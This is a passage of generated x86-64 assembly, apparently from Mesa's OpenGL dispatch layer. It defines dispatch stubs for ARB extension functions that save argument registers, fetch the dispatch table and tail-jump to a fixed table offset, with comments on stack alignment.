popq %rdi
movq 3440(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3440(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadTransposeMatrixdARB), .-GL_PREFIX(LoadTransposeMatrixdARB)

/* glLoadTransposeMatrixfARB — table offset 3448. */
.p2align 4,,15
.globl GL_PREFIX(LoadTransposeMatrixfARB)
.type GL_PREFIX(LoadTransposeMatrixfARB), @function
GL_PREFIX(LoadTransposeMatrixfARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3448(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadTransposeMatrixfARB), .-GL_PREFIX(LoadTransposeMatrixfARB)

/* glMultTransposeMatrixdARB — table offset 3456. */
.p2align 4,,15
.globl GL_PREFIX(MultTransposeMatrixdARB)
.type GL_PREFIX(MultTransposeMatrixdARB), @function
GL_PREFIX(MultTransposeMatrixdARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3456(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultTransposeMatrixdARB), .-GL_PREFIX(MultTransposeMatrixdARB)

/* glMultTransposeMatrixfARB — table offset 3464. */
.p2align 4,,15
.globl GL_PREFIX(MultTransposeMatrixfARB)
.type GL_PREFIX(MultTransposeMatrixfARB), @function
GL_PREFIX(MultTransposeMatrixfARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3464(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultTransposeMatrixfARB), .-GL_PREFIX(MultTransposeMatrixfARB)
/*
 * Dispatch stub for glSampleCoverageARB (generated x86-64 SysV code).
 * Two integer args (rdi/rsi); the %rbp push is padding so three pushes
 * keep %rsp 16-byte aligned at the lookup call.  Table offset 3472.
 */
.p2align 4,,15
.globl GL_PREFIX(SampleCoverageARB)
.type GL_PREFIX(SampleCoverageARB), @function
GL_PREFIX(SampleCoverageARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3472(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3472(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SampleCoverageARB), .-GL_PREFIX(SampleCoverageARB)
/*
 * Dispatch stubs for glCompressedTexImage{1,2,3}DARB (generated x86-64
 * SysV code).  Each has six-plus integer/pointer args, so all six
 * argument registers (rdi,rsi,rdx,rcx,r8,r9) are preserved around the
 * dispatch lookup; the %rbp push is padding that keeps %rsp 16-byte
 * aligned at the call (seven pushes, entry %rsp % 16 == 8).
 */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage1DARB)
.type GL_PREFIX(CompressedTexImage1DARB), @function
GL_PREFIX(CompressedTexImage1DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3480(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage1DARB), .-GL_PREFIX(CompressedTexImage1DARB)

/* glCompressedTexImage2DARB — table offset 3488. */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage2DARB)
.type GL_PREFIX(CompressedTexImage2DARB), @function
GL_PREFIX(CompressedTexImage2DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage2DARB), .-GL_PREFIX(CompressedTexImage2DARB)

/* glCompressedTexImage3DARB — table offset 3496. */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage3DARB)
.type GL_PREFIX(CompressedTexImage3DARB), @function
GL_PREFIX(CompressedTexImage3DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage3DARB), .-GL_PREFIX(CompressedTexImage3DARB)
/*
 * Dispatch stubs for glCompressedTexSubImage{1,2,3}DARB (generated
 * x86-64 SysV code).  Same shape as the CompressedTexImage stubs: all
 * six argument registers saved, %rbp pushed as alignment padding, then
 * a tail-jump through the per-function dispatch-table slot.
 */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage1DARB)
.type GL_PREFIX(CompressedTexSubImage1DARB), @function
GL_PREFIX(CompressedTexSubImage1DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3504(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3504(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage1DARB), .-GL_PREFIX(CompressedTexSubImage1DARB)

/* glCompressedTexSubImage2DARB — table offset 3512. */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage2DARB)
.type GL_PREFIX(CompressedTexSubImage2DARB), @function
GL_PREFIX(CompressedTexSubImage2DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3512(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage2DARB), .-GL_PREFIX(CompressedTexSubImage2DARB)

/* glCompressedTexSubImage3DARB — table offset 3520. */
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage3DARB)
.type GL_PREFIX(CompressedTexSubImage3DARB), @function
GL_PREFIX(CompressedTexSubImage3DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3520(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage3DARB), .-GL_PREFIX(CompressedTexSubImage3DARB)
/*
 * Dispatch stub for glGetCompressedTexImageARB (generated x86-64 SysV
 * code).  Three integer args; three pushes restore 16-byte stack
 * alignment for the lookup call.  Table byte offset 3528.
 */
.p2align 4,,15
.globl GL_PREFIX(GetCompressedTexImageARB)
.type GL_PREFIX(GetCompressedTexImageARB), @function
GL_PREFIX(GetCompressedTexImageARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3528(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCompressedTexImageARB), .-GL_PREFIX(GetCompressedTexImageARB)
/*
 * Dispatch stubs for glDisable/EnableVertexAttribArrayARB (generated
 * x86-64 SysV code).  One integer arg; the single %rdi push also
 * realigns %rsp to 16 bytes for the lookup call.
 */
.p2align 4,,15
.globl GL_PREFIX(DisableVertexAttribArrayARB)
.type GL_PREFIX(DisableVertexAttribArrayARB), @function
GL_PREFIX(DisableVertexAttribArrayARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3536(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3536(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DisableVertexAttribArrayARB), .-GL_PREFIX(DisableVertexAttribArrayARB)

/* glEnableVertexAttribArrayARB — table offset 3544. */
.p2align 4,,15
.globl GL_PREFIX(EnableVertexAttribArrayARB)
.type GL_PREFIX(EnableVertexAttribArrayARB), @function
GL_PREFIX(EnableVertexAttribArrayARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3544(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EnableVertexAttribArrayARB), .-GL_PREFIX(EnableVertexAttribArrayARB)
/*
 * Dispatch stubs for six ARB program-query entry points (generated
 * x86-64 SysV code): GetProgram{Env,Local}Parameter{d,f}vARB,
 * GetProgramStringARB and GetProgramivARB.  All take three
 * integer/pointer args; three pushes restore 16-byte stack alignment
 * for the lookup call before the tail-jump through %r11.
 */
.p2align 4,,15
.globl GL_PREFIX(GetProgramEnvParameterdvARB)
.type GL_PREFIX(GetProgramEnvParameterdvARB), @function
GL_PREFIX(GetProgramEnvParameterdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3552(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramEnvParameterdvARB), .-GL_PREFIX(GetProgramEnvParameterdvARB)

/* glGetProgramEnvParameterfvARB — table offset 3560. */
.p2align 4,,15
.globl GL_PREFIX(GetProgramEnvParameterfvARB)
.type GL_PREFIX(GetProgramEnvParameterfvARB), @function
GL_PREFIX(GetProgramEnvParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramEnvParameterfvARB), .-GL_PREFIX(GetProgramEnvParameterfvARB)

/* glGetProgramLocalParameterdvARB — table offset 3568. */
.p2align 4,,15
.globl GL_PREFIX(GetProgramLocalParameterdvARB)
.type GL_PREFIX(GetProgramLocalParameterdvARB), @function
GL_PREFIX(GetProgramLocalParameterdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramLocalParameterdvARB), .-GL_PREFIX(GetProgramLocalParameterdvARB)

/* glGetProgramLocalParameterfvARB — table offset 3576. */
.p2align 4,,15
.globl GL_PREFIX(GetProgramLocalParameterfvARB)
.type GL_PREFIX(GetProgramLocalParameterfvARB), @function
GL_PREFIX(GetProgramLocalParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3576(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramLocalParameterfvARB), .-GL_PREFIX(GetProgramLocalParameterfvARB)

/* glGetProgramStringARB — table offset 3584. */
.p2align 4,,15
.globl GL_PREFIX(GetProgramStringARB)
.type GL_PREFIX(GetProgramStringARB), @function
GL_PREFIX(GetProgramStringARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramStringARB), .-GL_PREFIX(GetProgramStringARB)

/* glGetProgramivARB — table offset 3592. */
.p2align 4,,15
.globl GL_PREFIX(GetProgramivARB)
.type GL_PREFIX(GetProgramivARB), @function
GL_PREFIX(GetProgramivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramivARB), .-GL_PREFIX(GetProgramivARB)
/*
 * Dispatch stubs for glGetVertexAttrib{d,f,i}vARB (generated x86-64
 * SysV code).  Three integer/pointer args; three pushes restore
 * 16-byte stack alignment for the lookup call.
 */
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribdvARB)
.type GL_PREFIX(GetVertexAttribdvARB), @function
GL_PREFIX(GetVertexAttribdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3600(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribdvARB), .-GL_PREFIX(GetVertexAttribdvARB)

/* glGetVertexAttribfvARB — table offset 3608. */
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribfvARB)
.type GL_PREFIX(GetVertexAttribfvARB), @function
GL_PREFIX(GetVertexAttribfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribfvARB), .-GL_PREFIX(GetVertexAttribfvARB)

/* glGetVertexAttribivARB — table offset 3616. */
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribivARB)
.type GL_PREFIX(GetVertexAttribivARB), @function
GL_PREFIX(GetVertexAttribivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribivARB), .-GL_PREFIX(GetVertexAttribivARB)
/*
 * Dispatch stub for glProgramEnvParameter4dARB (generated x86-64 SysV
 * code).  Two integer args plus four FP args in %xmm0-%xmm3; the xmm
 * registers are call-clobbered, so their low 64 bits are spilled to a
 * 56-byte scratch frame (which also keeps %rsp 16-byte aligned at the
 * call) and restored before the tail-jump.  Table byte offset 3624.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4dARB)
.type GL_PREFIX(ProgramEnvParameter4dARB), @function
GL_PREFIX(ProgramEnvParameter4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3624(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3624(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4dARB), .-GL_PREFIX(ProgramEnvParameter4dARB)
/*
 * Dispatch stub for glProgramEnvParameter4dvARB (generated x86-64 SysV
 * code).  Three integer/pointer args; three pushes restore 16-byte
 * stack alignment for the lookup call.  Table byte offset 3632.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4dvARB)
.type GL_PREFIX(ProgramEnvParameter4dvARB), @function
GL_PREFIX(ProgramEnvParameter4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3632(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4dvARB), .-GL_PREFIX(ProgramEnvParameter4dvARB)
/*
 * Dispatch stub for glProgramEnvParameter4fARB (generated x86-64 SysV
 * code).  Two integer args plus four FP args in %xmm0-%xmm3, spilled
 * (low 64 bits each) to a 56-byte scratch frame around the lookup call
 * and restored before the tail-jump.  Table byte offset 3640.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4fARB)
.type GL_PREFIX(ProgramEnvParameter4fARB), @function
GL_PREFIX(ProgramEnvParameter4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3640(%rax), %r11
jmp *%r11
#else
/* Fallback: direct table if initialized, else slow fetch at 1:. */
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3640(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4fARB), .-GL_PREFIX(ProgramEnvParameter4fARB)
/*
 * Dispatch stub for glProgramEnvParameter4fvARB (generated x86-64 SysV
 * code).  Three integer/pointer args; three pushes restore 16-byte
 * stack alignment for the lookup call.  Table byte offset 3648.
 */
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4fvARB)
.type GL_PREFIX(ProgramEnvParameter4fvARB), @function
GL_PREFIX(ProgramEnvParameter4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3648(%rax), %r11
